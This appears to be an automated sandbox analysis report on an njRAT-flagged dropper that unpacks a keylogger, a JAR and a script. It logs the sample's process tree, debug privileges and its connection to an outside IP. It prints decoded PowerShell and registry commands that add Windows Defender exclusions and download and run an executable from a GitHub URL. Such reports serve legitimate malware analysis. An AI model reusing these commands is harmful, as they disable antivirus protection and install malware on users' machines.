Source: final.exe, 0000000B.00000002.1518447401.00000000013B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{5d-
Source: powershell.exe, 00000009.00000002.2371660342.000002542A6A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: javaw.exe, 0000000C.00000002.3906245228.0000000000918000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cjava/lang/VirtualMachineError
Source: powershell.exe, 00000009.00000002.2371660342.000002542A6F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: powershell.exe, 00000009.00000002.2371660342.000002542A6A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: javaw.exe, 0000000C.00000003.1476564419.00000000148C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: java/lang/VirtualMachineError.classPK
Source: powershell.exe, 00000009.00000002.2371660342.000002542A6B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}T
Source: powershell.exe, 00000009.00000002.2354465263.000002542A367000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: javaw.exe, 0000000C.00000002.3906245228.0000000000918000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\virus.exe.bin.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Network Connect: 46.121.250.34 7777

.NET source code references suspicious native API functions

Source: Payload.exe.11.dr, kl.cs	Reference to suspicious API methods: MapVirtualKey(a, 0u)
Source: Payload.exe.11.dr, kl.cs	Reference to suspicious API methods: GetAsyncKeyState(num2)
Source: Payload.exe.11.dr, OK.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\			Jump to behavior

Encrypted powershell cmdline option found

Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded powershell.exe -command "Add-MpPreference -ExclusionPath "C:\
Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\
Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded $url = "https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe"$output = "$env:Temp/RuntimeBroker.exe"Invoke-WebRequest -Uri $url -OutFile $outputStart-Process -FilePath $output
Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded powershell.exe -command "Add-MpPreference -ExclusionPath "C:\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded $url = "https://github.com/AnonAm0369/am/raw/refs/heads/main/RuntimeBroker.exe"$output = "$env:Temp/RuntimeBroker.exe"Invoke-WebRequest -Uri $url -OutFile $outputStart-Process -FilePath $output	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe"	Jump to behavior
Source: C:\Users\user\Desktop\virus.exe.bin.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\ere.js"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Hyra.exe	Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\HugeHack.jar"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\ere.js" /elevate	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAIgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAIgBDADoAXAANAAoA	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath " C:\	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe"
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\final.exe	Process created: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe "C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Process created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc cgblagcaiabhagqazaagaciasablaewatqbcafmatwbgafqavwbbafiarqbcafaabwbsagkaywbpaguacwbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgbcaeuaeabjagwadqbzagkabwbuahmaxabqageadaboahmaigagac8adgagaemaogbcaa==
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc jab1ahiabaagad0aiaaiaggadab0ahaacwa6ac8alwbnagkadaboahuaygauagmabwbtac8aqqbuag8abgbbag0amaazadyaoqavageabqavahiayqb3ac8acgblagyacwavaggazqbhagqacwavag0ayqbpag4alwbsahuabgb0agkabqblaeiacgbvagsazqbyac4azqb4aguaiganaaoajabvahuadabwahuadaagad0aiaaiacqazqbuahyaogbuaguabqbwac8augb1ag4adabpag0azqbcahiabwbraguacgauaguaeablaciadqakaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbsacaalqbpahuadabgagkabablacaajabvahuadabwahuadaanaaoauwb0ageacgb0ac0auabyag8aywblahmacwagac0argbpagwazqbqageadaboacaajabvahuadabwahuadaa=
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc cgblagcaiabhagqazaagaciasablaewatqbcafmatwbgafqavwbbafiarqbcafaabwbsagkaywbpaguacwbcae0aaqbjahiabwbzag8azgb0afwavwbpag4azabvahcacwagaeqazqbmaguabgbkaguacgbcaeuaeabjagwadqbzagkabwbuahmaxabqageadaboahmaigagac8adgagaemaogbcaa==	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc jab1ahiabaagad0aiaaiaggadab0ahaacwa6ac8alwbnagkadaboahuaygauagmabwbtac8aqqbuag8abgbbag0amaazadyaoqavageabqavahiayqb3ac8acgblagyacwavaggazqbhagqacwavag0ayqbpag4alwbsahuabgb0agkabqblaeiacgbvagsazqbyac4azqb4aguaiganaaoajabvahuadabwahuadaagad0aiaaiacqazqbuahyaogbuaguabqbwac8augb1ag4adabpag0azqbcahiabwbraguacgauaguaeablaciadqakaekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbyagkaiaakahuacgbsacaalqbpahuadabgagkabablacaajabvahuadabwahuadaanaaoauwb0ageacgb0ac0auabyag8aywblahmacwagac0argbpagwazqbqageadaboacaajabvahuadabwahuadaa=	Jump to behavior

Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Progman
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp, Hyra.exe, 00000002.00000002.1558924287.0000000012AB5000.00000004.00000800.00020000.00000000.sdmp, final.exe, 0000000B.00000002.1629517817.0000000013345000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd+set CDAudio door open/set CDAudio door closed

Contains functionality to query CPU information (cpuid)

Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Code function: 12_2_023203C0 cpuid

12_2_023203C0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\virus.exe.bin.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\6252 VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\charsets.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables zone checking for all users

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS

AV process strings found (often used to terminate AV products)

Binary or memory string: Wireshark.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\AppData\Roaming\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Users\user\AppData\Roaming\dllhost.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Njrat

Source: Yara match	File source: virus.exe.bin.exe, type: SAMPLE
